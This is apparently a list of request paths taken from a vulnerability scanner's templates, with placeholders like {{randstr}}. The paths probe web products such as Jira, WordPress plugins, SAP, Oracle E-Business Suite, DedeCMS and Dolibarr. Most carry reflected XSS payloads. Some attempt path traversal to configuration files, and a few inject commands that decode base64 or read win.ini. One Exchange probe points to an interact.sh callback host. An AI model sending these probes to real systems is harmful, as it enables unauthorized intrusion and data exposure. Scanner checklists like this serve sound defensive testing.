/remote/login?&err=--%3E%3Cscript%3Ealert(
/{{randstr}}
/api/users
/cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/{{randstr}}/)%3C%2Fscript%3E
/s/{{randstr}}/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml
/s/{{randstr}}/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/{{randstr}}/)%3B%2F%2F
/?post_type=post&s=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3C/script%3E
/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://</script><svg/onload=alert(%27{{randstr}}%27)>
/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/{{randstr}}/);marmoset.embed(%27a
/s/{{randstr}}/_/;/WEB-INF/web.xml
/cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%27{{randstr}}%27)%3C/script%3E
/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x
/forum/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x
/if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28{{randstr}}%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY
/rewe/prod/web/rewe_go_check.php?config=rewe&version=7.5.0%3cscript%3econfirm({{randstr}})%3c%2fscript%3e&win=2707
/templates/pages/debug_panel.php?id={{randstr}}
/appliance/login?login[password]={{randstr}}%22%3E%3Csvg/onload=alert(document.domain)%3E&login[use_curr]=1&login[submit]=Change%20Password
/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3B%3C%2Fscript%3E%3C
/cwp_{{randstr}}/user1/fileManager2.php?frame=3&fm_current_dir=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/dolibarr/htdocs/user/card.php?id=2&action=create&signature={{randstr}}
/dolibarr/htdocs/user/card.php?id=2&action=create&lastname={{randstr}}
/dolibarr/htdocs/user/card.php?id=2&action=create&firstname={{randstr}}
/dolibarr/htdocs/user/card.php?id=2&action=create&office_phone={{randstr}}
/dolibarr/htdocs/user/card.php?id=2&action=create&user_mobile={{randstr}}
/dolibarr/htdocs/user/card.php?id=2&action=create&office_fax={{randstr}}
/dolibarr/htdocs/user/card.php?id=2&action=create&email={{randstr}}
/dolibarr/htdocs/user/card.php?id=2&action=create&job={{randstr}}
/dolibarr/htdocs/user/card.php?id=2&action=create&weeklyhours={{randstr}}
/dolibarr/htdocs/user/card.php?id=2&action=create&accountancy_code={{randstr}}
/dolibarr/htdocs/user/card.php?id=2&action=create&thm={{randstr}}
/dolibarr/htdocs/user/card.php?id=2&action=create&tjm={{randstr}}
/dolibarr/htdocs/user/card.php?id=2&action=create&salary={{randstr}}
/security-certificate-details.jsp?connectionType=SOCKET_S2S&alias=TEST-103_rsa&isTrustStore={{randstr}}
/?p={{post_id}}&0=echo+{{base64(string)}}|base64+-d
/?p={{post_id}}&0=type+C:\\windows\\win.ini
/?p={{post_id}}&0=type+..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
/admin/setup.php?sitename={{randstr}}&username={{randstr}}&email={{randstr}}@example.com
/dede/tpl.php?acdir=default&action=edit&filename={{randstr}}
/dede/mychannel_edit.php?mid={{randstr}}&dopost=modifysearch
/dede/file_manage_view.php?fmdo=edit&filename={{randstr}}&activepath=
/dede/sys_admin_user_edit.php?id=1&userid={{randstr}}&dopost=delete
/dede/makehtml_homepage.php?dopost=view&templet={{randstr}}
/index.php?u=/user/register
/admin/index.php?page=users/manage
/object
/ajax/share/{{randstr}}?delivery=view
/appsuite/api/oauth/proxy?api=com.openexchange.oauth.twitter&session=XYZ
/assets/scripts/modaldialog.js
/assets/scripts/uploader.js
/Public/JS/kindeditor-4.1.10/php/upload_json.php?dir=file
/media-libraries/upload
/api/v3/medialibraries/items/upload
/edit/web/?domain=<htmL/+/OnpOintEReNTEr%0d=%0d[
/api/upload?action=import
/upload
/sap/bc/gui/sap/its/webgui?~transaction=*SU01&sap-user={{randstr}}<script>alert(
/sap/bc/gui/sap/its/webgui?~transaction=*SU01&sap-user=<script>alert(
/irj/portal?NavigationTarget=navurl://{{randstr}}<script>alert(
/api/upload.php
/assets/upload
/clientdetails/admin/register.php
/upload?upload_id=k9wbugmn37
/mod/lti/auth.php?redirect_uri=javascript:alert(
/autodiscover/autodiscover.json/v1.0/{{randstr}}@interact.sh?Protocol=Autodiscoverv1
/OA_HTML/jtfLOVInProcess.jsp%3FAAA%3DAAAAAAAAAA%27%22%3E%3Csvg%2Fonload%3Dalert(
/OA_HTML/oksAutoRenewalHelp.jsp%3Fthanks%3D%27%22%3E%3Csvg%2Fonload%3Dalert(
/OA_HTML/ieuiMeetingErrorDisplay.jsp%3FErrCode%3D%27%22%3E%3Csvg%2Fonload%3Dalert(
/?{{randstr}}=wp-signup
/?{{randstr}}=wp-activate
/wp-content/plugins/nd-booking/readme.txt
